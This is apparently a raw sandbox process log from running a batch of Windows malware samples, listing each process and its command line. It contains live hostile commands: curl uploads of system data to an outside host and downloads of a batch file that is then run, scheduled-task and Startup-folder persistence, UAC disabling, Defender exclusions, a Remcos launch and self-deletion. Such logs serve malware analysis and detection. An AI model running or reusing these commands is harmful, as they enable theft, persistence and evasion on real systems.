C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe"

C:\Users\Admin\Desktop\Files\KuwaitSetupHockey.exe

"C:\Users\Admin\Desktop\Files\KuwaitSetupHockey.exe"

C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp

"C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp" /SL5="$30314,3849412,851968,C:\Users\Admin\Desktop\Files\KuwaitSetupHockey.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1828_133785013383972473\l4.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p24291711423417250691697322505 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "in.exe"

C:\Users\Admin\AppData\Local\Temp\main\in.exe

"in.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del in.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe"

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe"

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe"

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe"

C:\Users\Admin\Desktop\Files\onetap.exe

"C:\Users\Admin\Desktop\Files\onetap.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe"

C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe

"C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe"

C:\Users\Admin\Desktop\Files\Mswgoudnv.exe

"C:\Users\Admin\Desktop\Files\Mswgoudnv.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p24291711423417250691697322505 -oextracted

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p24291711423417250691697322505 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "in.exe"

C:\Users\Admin\AppData\Local\Temp\main\in.exe

"in.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del in.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe"

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\2DTJEUS2DTRQ" & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"

C:\Windows\SysWOW64\cmd.exe

cmd /c type "C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe"

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.10.1

C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe"

C:\Users\Admin\Desktop\Files\Mswgoudnv.exe

"C:\Users\Admin\Desktop\Files\Mswgoudnv.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_6516_133785013895310577\l4.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe" "C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe"

C:\Users\Admin\Desktop\Files\setup.exe

"C:\Users\Admin\Desktop\Files\setup.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt

C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"

C:\Users\Admin\Desktop\Files\svchost.exe

"C:\Users\Admin\Desktop\Files\svchost.exe"

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Users\Admin\AppData\Local\Temp\onefile_7532_133785013970182163\l4.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\svchost.exe'

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe"

C:\ProgramData\Remcos\remcos.exe

C:\ProgramData\Remcos\remcos.exe

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe"

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe

"C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\S0HVS2V3W4E3" & exit

C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\chrome11.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\chrome11.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp133B.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp133B.tmp.bat

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Users\Admin\Desktop\Files\wow.exe

"C:\Users\Admin\Desktop\Files\wow.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\gU8ND0g.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\gU8ND0g.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del gU8ND0g.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 336 -ip 336

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 336 -s 1732

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\O8GDJEKN7YCJ" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Windows\System32\GameBarPresenceWriter.exe

"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.funletters.net/readme.htm

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcc0f446f8,0x7ffcc0f44708,0x7ffcc0f44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.funletters.net/readme.htm

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcc0f446f8,0x7ffcc0f44708,0x7ffcc0f44718

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService

C:\Users\Admin\Desktop\New Text Document mod.exse\a\SH.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\SH.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Systenn.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Systenn.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,5477233236301179200,12933220128853594848,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,5477233236301179200,12933220128853594848,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:1

C:\Users\Admin\Desktop\Files\random.exe

"C:\Users\Admin\Desktop\Files\random.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3796 /prefetch:1

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\qwex.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\qwex.exe"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\Desktop\New Text Document mod.exse\a\XW.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\XW.exe"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe

